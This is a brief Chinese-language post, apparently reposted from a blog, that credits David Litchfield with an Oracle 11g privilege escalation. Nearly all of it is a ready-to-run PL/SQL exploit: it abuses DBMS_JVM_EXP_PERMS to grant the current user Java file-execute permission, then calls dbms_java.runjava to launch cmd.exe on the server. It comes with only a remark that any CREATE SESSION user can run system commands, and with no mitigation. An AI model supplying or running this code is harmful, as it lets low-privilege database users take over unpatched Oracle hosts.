David Litchfield真是牛人中的牛人,oracle11g,只要是有create session权限的用户,就能执行系统命令:
|
DECLARE |
|
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; |
CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','<>','execute','ENABLED' from dual; |
BEGIN |
OPEN C1; |
FETCH C1 BULK COLLECT INTO POL; |
CLOSE C1; |
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); |
END; |
/ |
select dbms_java.runjava(‘oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;
原处:http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/
